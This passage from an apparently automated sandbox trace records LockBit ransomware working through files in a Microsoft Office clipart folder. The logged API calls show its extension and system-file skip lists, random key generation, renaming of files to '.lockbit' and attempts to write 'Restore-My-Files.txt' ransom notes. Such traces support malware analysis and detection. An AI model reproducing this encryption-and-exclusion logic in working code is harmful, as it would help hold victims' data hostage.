Office\\CLIPART\\PUB60COR\\HH02312_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.613] malloc (_Size=0xa6) returned 0x77d7a8 [0118.613] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.614] free (_Block=0x77d7a8) [0118.614] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.614] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.614] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.615] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x949ef200, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x949ef200, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH02313_.WMF", cAlternateFileName="")) returned 1 [0118.615] lstrcmpiW (lpString1=".", lpString2="HH02313_.WMF") returned -1 [0118.615] lstrcmpiW (lpString1="..", lpString2="HH02313_.WMF") returned -1 [0118.615] PathFindExtensionW (pszPath="HH02313_.WMF") returned=".WMF" [0118.615] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.615] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.616] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH02313_.WMF") returned 1 [0118.617] lstrcmpiW (lpString1="ntldr", lpString2="HH02313_.WMF") returned 1 [0118.617] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH02313_.WMF") returned 1 [0118.617] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH02313_.WMF") returned -1 [0118.617] lstrcmpiW (lpString1="autorun.inf", lpString2="HH02313_.WMF") returned -1 [0118.617] lstrcmpiW (lpString1="thumbs.db", lpString2="HH02313_.WMF") returned 1 [0118.617] lstrcmpiW (lpString1="iconcache.db", lpString2="HH02313_.WMF") returned 1 [0118.617] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.617] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF") returned=".WMF" [0118.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.617] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.618] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.618] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.lockbit") returned 72 [0118.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0118.619] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.619] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.619] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3082) returned 1 [0118.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.620] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.626] malloc (_Size=0xa6) returned 0x77d7a8 [0118.626] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.627] free (_Block=0x77d7a8) [0118.627] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.627] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.627] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.628] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58502100, ftCreationTime.dwHighDateTime=0x1bf0ae8, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58502100, ftLastWriteTime.dwHighDateTime=0x1bf0ae8, nFileSizeHigh=0x0, nFileSizeLow=0x5b04, dwReserved0=0x0, dwReserved1=0x0, cFileName="HM00005_.WMF", cAlternateFileName="")) returned 1 [0118.628] lstrcmpiW (lpString1=".", lpString2="HM00005_.WMF") returned -1 [0118.628] lstrcmpiW (lpString1="..", lpString2="HM00005_.WMF") returned -1 [0118.628] PathFindExtensionW (pszPath="HM00005_.WMF") returned=".WMF" [0118.628] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.628] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.628] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.628] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.628] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.629] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.630] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.630] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HM00005_.WMF") returned 1 [0118.631] lstrcmpiW (lpString1="ntldr", lpString2="HM00005_.WMF") returned 1 [0118.631] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HM00005_.WMF") returned 1 [0118.631] lstrcmpiW (lpString1="bootsect.bak", lpString2="HM00005_.WMF") returned -1 [0118.631] lstrcmpiW (lpString1="autorun.inf", lpString2="HM00005_.WMF") returned -1 [0118.631] lstrcmpiW (lpString1="thumbs.db", lpString2="HM00005_.WMF") returned 1 [0118.631] lstrcmpiW (lpString1="iconcache.db", lpString2="HM00005_.WMF") returned 1 [0118.631] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.631] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF") returned=".WMF" [0118.631] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.631] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.631] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.632] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.632] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.lockbit") returned 72 [0118.632] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.637] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.637] malloc (_Size=0x40068) returned 0x3ef0008 [0118.637] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=23300) returned 1 [0118.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.639] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.645] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.646] malloc (_Size=0xa6) returned 0x77d7a8 [0118.646] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.647] free (_Block=0x77d7a8) [0118.647] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.647] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.647] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.647] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc19dc700, ftCreationTime.dwHighDateTime=0x1bd4b33, ftLastAccessTime.dwLowDateTime=0x538bb350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc19dc700, ftLastWriteTime.dwHighDateTime=0x1bd4b33, nFileSizeHigh=0x0, nFileSizeLow=0x5664, dwReserved0=0x0, dwReserved1=0x0, cFileName="HM00114_.WMF", cAlternateFileName="")) returned 1 [0118.647] lstrcmpiW (lpString1=".", lpString2="HM00114_.WMF") returned -1 [0118.647] lstrcmpiW (lpString1="..", lpString2="HM00114_.WMF") returned -1 [0118.647] PathFindExtensionW (pszPath="HM00114_.WMF") returned=".WMF" [0118.647] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.647] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.647] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.647] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.647] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.648] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.649] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.649] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.650] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HM00114_.WMF") returned 1 [0118.650] lstrcmpiW (lpString1="ntldr", lpString2="HM00114_.WMF") returned 1 [0118.650] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HM00114_.WMF") returned 1 [0118.650] lstrcmpiW (lpString1="bootsect.bak", lpString2="HM00114_.WMF") returned -1 [0118.650] lstrcmpiW (lpString1="autorun.inf", lpString2="HM00114_.WMF") returned -1 [0118.650] lstrcmpiW (lpString1="thumbs.db", lpString2="HM00114_.WMF") returned 1 [0118.650] lstrcmpiW (lpString1="iconcache.db", lpString2="HM00114_.WMF") returned 1 [0118.650] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.650] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00114_.WMF") returned=".WMF" [0118.651] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.651] lstrcmpiW (lpString1=".zip", 